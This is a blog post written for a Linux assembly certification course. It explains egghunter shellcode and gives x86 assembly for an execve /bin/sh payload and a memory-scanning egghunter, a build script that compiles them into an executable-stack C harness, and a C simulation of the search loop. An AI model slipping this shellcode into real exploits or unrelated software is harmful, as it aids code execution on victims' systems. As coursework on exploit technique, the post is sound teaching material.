Sunday, January 4, 2015

3. Egghunter shellcode

The exam for the SecurityTube Linux Assembly Expert course consists of creating or analyzing shellcodes. This is the third assignment, where I have to create an egghunter shellcode whose egg pattern is configurable.


Usually during an exploit there is not enough space for the shellcode. One way to solve this problem is to split the shellcode into two parts. The first part is the shellcode we actually want to run, which cannot fit in the space the exploit provides; the second part is a much smaller shellcode, the egghunter, which does fit and whose only job is to locate the first part in memory and jump to it. To make it findable, the real shellcode begins with a magic string (the egg) written twice in a row, and the egghunter walks through memory looking for two consecutive copies. The egg has to be duplicated because the hunter itself contains the egg once, as the immediate operand of its compare instruction, so a search for a single copy could match the hunter's own code.

Let's start with the /bin/sh shellcode, which carries the doubled egg at its very beginning:

global _start
section .text
_start:
db "eGGheGGh"           ;declare egghunter keyword: the egg, twice in a row
; Pushing //bin/sh
xor eax, eax
push eax                ;NULL terminator for the string
mov esi, 0x46510d0d     ;decode /bin/sh: 0x46510d0d + 0x22222222 = 0x68732f2f
add esi, 0x22222222     ;push 0x68732f2f ;"sh//"
mov dword [esp-4], esi
mov esi, 0x4c47411d     ;decode /bin/sh: 0x4c47411d + 0x22222112 = 0x6e69622f
add esi, 0x22222112     ;push 0x6e69622f ;"nib/"
mov dword [esp-8], esi
sub esp, 8              ;align esp: esp now points at "/bin//sh\0"
mov ebx, esp            ;ebx = filename
push eax                ;NULL
mov edx, esp            ;edx = envp (points at the NULL)
push ebx                ;pointer to the filename
mov ecx, esp            ;ecx = argv = {filename, NULL}
mov al, 11              ;sys_execve
int 0x80

And the so-called egghunter shellcode:
global _start
section .text
_start:
pop eax                             ;start address: whatever is on top of the stack
_next:
inc eax                             ;advance one byte at a time
_isegg:
cmp dword [eax-0x8],0x68474765      ;start egg ("eGGh" as a little-endian dword)
jne _next
cmp dword [eax-0x4],0x68474765      ;end egg: the second copy must follow immediately
jne _next
jmp eax                             ;execute our (not so tiny) shellcode
; Note: the scan has no bound and performs no access() check, so it
; faults as soon as it walks into an unmapped page.

And finally, the script to configure, build and run the shellcodes:
#!/bin/bash
# Usage: ./all_compile.sh eggh shellcode eGGh
#   $1 = egghunter source (eggh.nasm), which contains the egg as the
#        dword constant 0x68474765
#   $2 = payload source (shellcode.nasm), which contains the egg as the
#        string "eGGheGGh"
#   $3 = the 4-character egg to use instead of the default "eGGh"
if [ $# -ne 3 ] || [ ${#3} -ne 4 ]; then
    echo 'Usage: ./all_compile.sh source_file shellcode_file pattern  E.g. ./all_compile.sh eggh shellcode eGGh  (eggh.nasm is the egghunter source, the pattern is 4 characters)'
    exit 1
fi

# The egg as a little-endian dword, e.g. "eGGh" -> 65474768 -> 68474765
patt=`echo -n "$3" | xxd -p | sed -r 's/([0-9a-f]{2})([0-9a-f]{2})([0-9a-f]{2})([0-9a-f]{2})/\4\3\2\1/'`
echo "pattern in reverse hex: $patt"

# Egghunter: keep a pristine copy, patch the egg constant, assemble, link, dump
[ -f $1.nasm_orig ] || cp $1.nasm $1.nasm_orig
sed s/0x68474765/0x$patt/g < $1.nasm_orig > $1.nasm
echo '[+] Assembling with Nasm ... '
nasm -f elf32 -o $1.o $1.nasm
echo '[+] Linking ...'
ld -melf_i386 -o $1 $1.o
echo '[+] Dumping shellcode ...'
echo -n '' > shellcode1.asm
for i in `objdump -d $1 | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$'`; do echo -n "\x$i" >> shellcode1.asm; done

# Payload: same steps, but here the egg is patched as a string in the db line
[ -f $2.nasm_orig ] || cp $2.nasm $2.nasm_orig
sed s/eGGh/$3/g < $2.nasm_orig > $2.nasm
echo '[+] Assembling with Nasm ... '
nasm -f elf32 -o $2.o $2.nasm
echo '[+] Linking ...'
ld -melf_i386 -o $2 $2.o
echo '[+] Dumping shellcode ...'
echo -n '' > shellcode2.asm
for i in `objdump -d $2 | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$'`; do echo -n "\x$i" >> shellcode2.asm; done

# Glue both byte strings into a C test harness
echo '[+] Creating new shellcode.c ...'
cat > shellcode.c <<EOF
#include <stdio.h>
#include <string.h>
unsigned char egg_hunter[] = "\\
EOF
cat shellcode1.asm >> shellcode.c
cat >> shellcode.c <<EOF
";
unsigned char code[] = "\\
EOF
cat shellcode2.asm >> shellcode.c
cat >> shellcode.c <<EOF
";
int main()
{
printf("Length of egg_hunter is %d\n", (int)strlen(egg_hunter));
printf("Length of shellcode is %d\n", (int)strlen(code));
(*(void (*)()) egg_hunter)();
return 0;
}
EOF
echo '[+] Compiling shellcode.c ...'
gcc -fno-stack-protector -z execstack -m32 -o shellcode shellcode.c
echo '[+] Done! Run ./shellcode to execute!'
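To make the two design points from above checkable without executing any shellcode, here is an added example (my own code, not part of the original post or the course material) that models the egghunter's search loop in plain C. egg_dword() turns a 4-character egg into the dword immediate the hunter compares against, which is exactly what the script's xxd/sed byte reversal computes, and hunt_double() versus hunt_single() shows why the egg must be written twice: the hunter's own cmp instruction embeds the egg once, so a single-compare hunter lands inside its own code. The memory image, the instruction bytes and the payload marker are all constructed for the demonstration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the original post. It re-implements the
 * egghunter's search loop in plain C so the egg encoding and the
 * "egg twice" rule can be checked without running shellcode. Every
 * buffer below is constructed for the demonstration. */

/* Little-endian dword of a 4-character egg: "eGGh" -> 0x68474765 */
uint32_t egg_dword(const char *egg)
{
    uint32_t v = 0;
    for (int i = 3; i >= 0; i--)
        v = (v << 8) | (uint8_t)egg[i];
    return v;
}

/* Read a dword the way `cmp dword [eax-8], imm32` reads memory */
static uint32_t load_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* The post's hunter: step eax one byte at a time and require the egg at
 * both [eax-8] and [eax-4]; return the offset it would `jmp eax` to.
 * Unlike the real hunter this version stops at the end of the buffer;
 * the shellcode has no bound and faults if it walks into unmapped memory. */
long hunt_double(const uint8_t *mem, size_t len, size_t start, uint32_t egg)
{
    for (size_t eax = start; eax <= len; eax++) {
        if (eax < 8)
            continue;
        if (load_le32(mem + eax - 8) == egg && load_le32(mem + eax - 4) == egg)
            return (long)eax;
    }
    return -1;
}

/* Same loop with one compare, to show what goes wrong without the duplicate */
long hunt_single(const uint8_t *mem, size_t len, size_t start, uint32_t egg)
{
    for (size_t eax = start; eax <= len; eax++) {
        if (eax < 4)
            continue;
        if (load_le32(mem + eax - 4) == egg)
            return (long)eax;
    }
    return -1;
}

/* Constructed memory image: the hunter's own `cmp dword [eax-0x8],0x68474765`
 * (encoded 81 78 f8 65 47 47 68, which embeds the egg once), some filler,
 * then the doubled egg followed by a payload marker byte. */
#define HUNTER_LEN 7
#define FILLER_LEN 16
#define EGG_LEN 8
#define IMAGE_LEN (HUNTER_LEN + FILLER_LEN + EGG_LEN + 1)

size_t build_image(uint8_t *mem)
{
    static const uint8_t hunter[HUNTER_LEN] = {0x81, 0x78, 0xf8, 0x65, 0x47, 0x47, 0x68};
    memcpy(mem, hunter, HUNTER_LEN);
    memset(mem + HUNTER_LEN, 0x41, FILLER_LEN);
    memcpy(mem + HUNTER_LEN + FILLER_LEN, "eGGheGGh", EGG_LEN);
    mem[IMAGE_LEN - 1] = 0xcc;          /* stands in for the payload's first byte */
    return IMAGE_LEN;
}

/* Offset the double-compare hunter lands on: the payload byte (31) */
long demo_double(void)
{
    uint8_t mem[IMAGE_LEN];
    size_t n = build_image(mem);
    return hunt_double(mem, n, 0, egg_dword("eGGh"));
}

/* Offset a single-compare hunter lands on: inside its own code (7) */
long demo_single(void)
{
    uint8_t mem[IMAGE_LEN];
    size_t n = build_image(mem);
    return hunt_single(mem, n, 0, egg_dword("eGGh"));
}

int main(void)
{
    printf("egg dword          : 0x%08x\n", egg_dword("eGGh"));
    printf("double compare hits: %ld (payload at %d)\n", demo_double(), IMAGE_LEN - 1);
    printf("single compare hits: %ld (inside the hunter itself)\n", demo_single());
    return 0;
}
```

Build it with a plain gcc -o egg_sim egg_sim.c and run it: the double-compare loop reports offset 31, the payload marker, while the single-compare loop reports offset 7, the byte right after the egg inside the hunter's own instruction. That is the situation the duplicated egg exists to prevent.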

Let's test this!

Happy shell! :)

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student-ID: SLAE - 607
